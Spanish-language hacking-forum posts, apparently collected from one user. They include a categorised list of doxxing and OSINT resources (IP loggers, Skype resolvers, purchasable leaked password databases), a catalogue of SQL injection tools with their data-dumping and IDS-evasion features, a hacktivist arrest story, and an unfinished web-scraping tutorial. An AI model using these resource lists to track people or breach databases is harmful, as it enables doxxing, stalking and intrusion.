Hola,

Nadie sabrá qué contraseña han insertado en dichos computadores, sin embargo, si posees un CD LIVE de Windows o de GNU / Linux puedes modificar sencillamente la contraseña. Hay información de esto en el foro, te aconsejo echarle una ojeada.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.

Hola,

La verdad no conozco de una aplicación con esas mismas especificaciones PERO lo que se me ocurre es que, podrías usar una aplicación ya existente y vincularla con un .bat o crear tú mismo la aplicación e indicarle lo de la copia de archivos. Por otra parte, hacerlo en bash es muy sencillo, de hecho, podrías incluso convertir el .bat a .exe con la siguiente herramienta:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Además de todo esto, tendrías que especificarle al .bat la ruta de donde están los archivos que deseas copiar.

Un saludo.

Hola a tod@s,

Hoy les traigo una recopilación de herramientas que en determinado momento realicé para el tema de encontrar información de "X" persona. Cabe aclarar que me faltan, pero los pondré luego en un segundo post. Sin más, espero y les puede llegar a servir:

Username - Alias:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Archives:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Social Networks:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Phone Numbers:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Skype Resolvers:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

IP Addresses:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Database Search

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



WHOIS/Website

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




Images:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




IP2Skype:


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Email2Skype:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Skype2Email:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Skype2Lan:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


MAC Address Lookup:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login





Latitude/Longitude:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




EXIF Data:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




IP Loggers:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




Others:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Search sites:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (UK)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (UK)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (UK)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (UK)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (viewing information behind a picture)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (Denmark)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (UK)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



WhitePages Search:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login





Busqueda de paginas antiguas

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




Busqueda en redes sociales


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (Monitor twitter convos)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




Passwords

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (Yo can buy private/public DataBases entrys $0.50-0.70 per DB entry)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login





Phone Information and Lookups:


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




Criminal records searches:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login





Track IP:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (IP2skype + skype2IP)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si alguien quiere colaborar poniendo más, es bienvenid@.

Un saludo.

Hola,

Como los demás lo mencionan, estaría bueno si la historia entrometiera bastante en un mundo surrealista al usuario. Lo de que aparece una serpiente y te quito -5 PV, me parece un poco a Pokemón(a mi parecer) y más bien te diría que deberías darle un aspecto único.

Una idea...
¿Y si también lo haces con pistas web? es decir, que vas caminando y te encontraste un minimapa o algo por el estilo, ahí se abre el explorador web con una página donde está el minimapa y ahí el usuario se podrá guiar cuando de la opción de qué camino quiere elegir.
La verdad, hay muchas cosas, pero esa es una idea que se me vino ahora a la mente.

Un saludo.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, Tienes toda la razón, mal uso de la palabra, era localizar  . Corregido y gracias. Por otra parte, creo que el problema no fue tanto de lo de carding, más bien fue de meterse con la gente equivocada. Exactamente, con gente que tuvo dinero para dar con él(aunque ya hace años lo habían doxeado).

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, En mi opinión, sería gris.

Un saludo.

Hola a tod@s,

Sé que existen diversas herramientas para explotar las inyecciones SQL y bueno, las de apilado de otra forma. Les voy a dejar unas herramientas que en determinado momento usé(hace años) y que conozco de su uso, así que comencemos.

A continuación, el listado de herramientas que quizá les servirá para que vean algunas de sus diferencias(funcionalidad por ejemplo):

Safe3 SQL Injector

Nos permite realizar inyecciones a SGDB como por ejemplo: MySQL, PostgreSQL, MSSQL, Oracle, ACCESS, Sybase, Sqlite y DB2.


Cuando me dí cuenta de ésta herramienta, me fijé en que era realmente potente y además, muy fácil de usar. Como mencioné anteriormente, está enfocada a usos para explotar dichos SGDB pero también tiene otra ventaja y es, permite la ejecución de código arbitrario. Sin duda, es una herramienta que deberías probar, la puedes descargar desde el siguiente enlace:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


SQL Power Injector

Nos permite realizar inyecciones a SGDB como por ejemplo: MySQL, Microsoft SQL Server, Oracle, Sybase/Adaptive Server y DB2.


Una herramienta que nos permite ver hasta distintos parámetros como respuesta. La podemos descargar e inspeccionar más sus funcionalidades con detalle en:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

BSQL Hacker

Nos permite realizar inyecciones a SGDB como por ejemplo: MySQL, MSSQL Y Oracle.


Desarrollado por Portcullis Labs, es una herramienta con el propósito de Inyección sql, soportando incluso la inyección sql a ciegas. Nos muestra tres textarea's donde nos da a conocer las respuestas verdaderas, falsas y con error. Puedes descargar esta herramienta desde el siguiente enlace:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


The Mole



Una herramienta de fuente abierta, permitiéndonos eludir sistemas de detección de intrusos y de prevención de intrusos( IDS / IPS). Se puede indicar el punto de inyección y además, los SGDB de alcance de esta herramienta son: Mysql, Postgresql y Oracle. La puedes descargar del siguiente enlace:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Sqlmap


Una herramienta de las más poderosas y de las mejores hasta el momento. Nos da la posibilidad de realizar muchísimas funciones que no mencionaré aquí pero que pueden buscar en el foro, hay mucha información. Los SGDB que están disponibles para la explotación se segmentan de la siguiente manera:

Soporte completo: MySQL, Oracle, PostgreSQL y Microsoft SQL Server.
Soporte parcial: Microsoft Access, DB2, Informix, Sybase e Interbase.

Podemos descargar esta herramienta desde el siguiente enlace:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sqlninja

Al SGDB que permite realizar inyección, es a las aplicaciones que usen Microsoft SQL Server.


Está en Perl y el objetivo principal es proporcionar un acceso remoto en el servidor de base de datos vulnerable, a pesar de que su ambiente sea un poco hostil. Pueden descargarla desde:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Havij



Una herramienta que se volvió muy popular por las personas que hacen ciberdelincuencia y que tomó tanta fuerza por su facildiad de uso. Desarrollado en vb6 y por ITSecTeam, es una herramienta la cual nos permitirá volcar datos, dumpear tablas, obtener usuarios y hashes de contraseñas y entre otros. La página de ITSecTeam no existe, por tanto, puedes buscar y descargar de donde creas que es más conveniente.

SQL Poizon


La interfaz gráfica de SQL Poizon para usuarios sin una gran experiencia permite realizar inyecciones con una gran eficiencia. SQL Poizon también tiene la opción para seleccionar dorks existentes o crear nuestro propio dork. Al igual que Havij, podrás buscar la herramienta en Google y revisar cuál es la opción más conveniente.

Para finalizar, recuerda que existen muchas más herramientas, como por ejemplo: Priamos, mySQLenum, DarkMySQLi, Sqlus, Witool, Pysqlin, Pangolin, Enema SQLi y entre otros.

Recuerda que cualquier herramienta donde no se encuentre el sitio oficial es mucho mejor realizar las pruebas en entornos controlados. Además, deberías aprender de cómo hacer éstas manualmente, así comprenderás el cómo funciona todo. La recolección de éstas herramientas pretende mostrar cuál podrías usar cuando ya tienes algo de experiencia y necesitas tiempo.

Si conoces otra herramienta que desees compartir, puedes comentarla .

Posdata: en cada uno de los enlaces podrán ver las características de cada una de ellas, no las puse en el post porque no tendría sentido.

Un saludo.

Hola n1sendev,

Por favor pon aquí la línea de cómo estás leyendo el archivo. Por otra parte, estoy suponiendo que el archivo se encuentra en la misma carpeta de donde estás ejecutando tu script de Python, ¿cierto?.

Saludos.

La tecnología ha acaparado casi los lugares más recónditos del mundo, desde zonas rurales hasta zonas centrales. Las aplicaciones desarrolladas por equipos de desarrollo han hecho posible avanzar la tecnología a pasos agigantados, desde poder realizar una foto hasta poder realizar transacciones bancarias.

Team Hack Argentino, un grupo con ideología Hacktvista comenzado por el año de 2012 aproximadamente, es adjudicado de realizar principalmente ataques de Defacements a páginas del gobierno argentino. Sus (EX)miembros : [Nyu] , Tobitow, Libero y entre otros, son los pioneros en comenzar uno de los teams que se convirtió en uno de los más grandes en Latinoamérica.

Sin embargo, algunos ideales de los integrantes de éste grupo cambiaron. Libero, una de las personas la cual poseía buenas habilidades técnicas, transfiguró su ideología por una más monetaria, una como el carding. Éste último concepto hace referencia a los cibercriminales que usan tarjetas de crédito foráneas de otras personas.

Eran los inicios del año 2017, cuando la cuenta de Twitter de la ministra de seguridad de la nación Patricia Bullrich se vio comprometida por atacantes. Mediante una técnica de Phishing el miembro de THA, Libero, logró penetrar la cuenta de ésta. Aprovechando los muchos seguidores que poseía, un usuario de twitter apodado como "Niño Orsino" publicó ese mismo día en resumen, que ya había entrado ahí. Sin embargo, él sí llegó a poseer dos contraseñas donde figuraban dos cuentas de Bullrich, no obstante, nunca pudo crackear los hashes en los que estaban las claves. En las declaraciones que dio "Niño Orsino" a las autoridades, siempre acusó por temor probablemente, que observaran el twitter de Libero, en otras palabras, acusándolo a él y desligándose del fulminante ataque.   Cabe denotar que "Niño Orsino" tenía acceso a la PSA(Policía de Seguridad Aeroportuaria) y por entrar ahí, lo descubrieron por localización de IP.
Cuando detuvieron a Libero por sus actos que infringen la ley en Argentina, la ministra Bullrich comentó lo siguiente:

CitarQuienes infringen la ley deben responder ante la justicia por sus actos; no hay delitos sin sanción.

Agregando a su vez lo siguiente:

CitarLo importante es que los hechos han quedado esclarecidos y los responsables fueron todos identificados.

Por otra parte, desaría agregar que en un tiempo atrás, también se rumoreaba que Libero estaba realizando Carding con un integrante de MexicanHackers llamado Ahmad. A los dos les enviaron orden judicial, sin embargo se desconoce los detalles.

Para finalizar, no se sabe cuántos años se le han dado a Libero y añado que THA está inactivo por estos momentos.

De algo si estoy completamente seguro y es que, cuando se es Hacktivista la gente no aprecia lo que haces por ella. Desde las mismas empresas que te intentan intimidar con la policía, hasta las mismas personas, que te dicen: "Lucha, ataca a los políticos, filtra los datos" pero cuando te atrapan, esa misma gente se olvida de ti y no hace nada. Sé perfectamente de lo que hablo, y si no me llegasen a creer, creo que no hay ejemplo más práctico que el de Edward Snowden.

Muchos le tenían repulsión a Libero porque decían que él defaceaba sitios que compraba. De igual manera, también se hizo muy popular por lo de las Islas Malvinas.

Cualquier duda/sugerencia y/o aporte será bienvenido.

¿Y tú qué opinas?.

Saludos.

Enlaces de interés:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola a tod@s,

Cuando estamos trabajando en seguridad informática y queremos recolectar 'x' cosa de determinada página, llegamos a un punto donde se nos hace tedioso o frustrante realizar las cosas nosotros mismos, para ello usamos el web scraping.

Les he traído un spider que realicé ya hace algún tiempo pero que me decidí a compartir. Pueden mejorarlo y bueno, en el código he dejado los comentarios de cada una de las líneas para qué sirve cada una. A continuación los requisitos para que funcione el spider.

Antes de comenzar, me gustaría que conocieran los componentes de una página web.

COMPONENTES DE UNA PÁGINA WEB

Al visitar una página web, nuestro navegador que es el cliente(les recomiendo leer la arquitectura cliente/servidor para entender un poco más acerca de esto) realizar una solicitud a un servidor web. Esta solicitud es por el método GET del protocolo HTTP, ya que estamos recibiendo archivos del servidor. A continuación, el servidor envía dichos archivos indicándole a nuestro navegador web el cómo procesar la página para nosotros. Los archivos se dividen generalmente así:

• HTML: Contiene el contenido principal de la página web.
• JavaScript: Agrega interactividad a la página web.
• CSS: Agrega el estilo a la página web, así lucirá más agradable.
• Imágenes: Los formatos de imágenes como .PNG y .JPG permiten que las páginas web muestren imágenes.

Nuestro navegador web recibe todos los archivos y nos muestra la página. Realmente ocurren muchas cosas pero que ustedes pueden afianzar sus conocimientos leyendo la arquitectura que les mencioné anteriormente. Al momento de realizar un spider o de hacer web scraping, lo que más  nos interesa es el contenido principal de la página web, es decir, el HTML.

COMPRENDAMOS MÁS DE HTML

El lenguaje de marcas de hipertexto (HTML) es un lenguaje en el que se crean las páginas web. HTML no es un lenguaje de programación/scripting, como Python; en cambio, es un lenguaje de etiquetas que le dice a un navegador cómo distribuir el contenido a mostrar.
Conozcamos un poco más de HTML para que sepamos cómo hacer scraping con eficacia. El HTML consiste en elemtnos llamados etiquetas. La etiqueta más básia es la de <html>. Ésta etiqueta, nos permite indicarle al navegador web que todo lo que está adentro de ella es HTML.

Vamos a poner un ejemplo, creemos un documento de html en nuestro bloc de notas o editor de texto preferido(Notepad ++, Sublime, Atom, entre otros):

<html>
</html>

Aún no hemos agregado ningún contenido a nuestra página web, por lo que si lo vemos en nuestro navegador veríamos todo en blanco.


Dentro de las etiquetas de HTML debemos añadir las otras dos etiquetas esenciales que componen el HTML, la etiqueta <head> y la etiqueta <body>. En la etiqueta body se incluye el contenido principal de la página web, la etiqueta head contiene datos como el título de la página, la codificación de caracteres a usar, los tags y bueno, otra información que no nos es útil para el scraping.

<html>
    <head>
    </head>
    <body>
    </body>
</html>

Si notan, solo hemos puesto las etiquetas más no contenido alguno, por lo que no volveremos a ver nada.


Ahora, agregaremos nuestro primer contenido a la página, con la etiqueta <p>. La etiqueta p define un párrafo y cualquier texto dentro de esta etiqueta, se mostrará como un párrafo por separado.

<html>
    <head>
    </head>
    <body>
        <p>
            Primer párrafo de texto!
        </p>
        <p>
            Segundo párrafo de texto!
        </p>
    </body>
</html>

Así se nos mostrará:


También podemos agregar hipervinculos con la etiqueta <a href>:

<html>
    <head>
    </head>
    <body>
        <p>
            Primer párrafo de texto!
            <a href="https://youtube.com/VIINVIDEOSHD">Learn Hacking and CyberSecurity!</a>
        </p>
        <p>
            Segundo párrafo de texto!
            <a href="https://viinacademy.com">Learn Hacking and CyberSecurity with the platform!</a>
        </p>
    </body>
</html>

Y se vería de ésta manera:

La etiqueta a indica que son enlaces y le dice al navegador que deberá hacer un enlace a otra página web. ¿A cuál página web? pues para eso es la etiqueta href, para indicar cuál es el enlace.

Entendiendo esto, pasaremos a ver los requisitos/instalación para realizar spiders y/o web scraping.

---

REQUISITOS

Debemos descargar las siguientes librerías(puedes ir al link directamente haciendo click encima de cada elemento):

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

INSTALACIÓN

Suponiendo que ya tenemos python en la versión 3.x, descargamos y procedemos a instalar nuestro beautifulsoup(bs4) y nuestros requests.



Una vez instaladas las librerías, les mostraré el ejemplo de cómo usar y su función para la que están principalmente diseñadas.

REQUESTS...

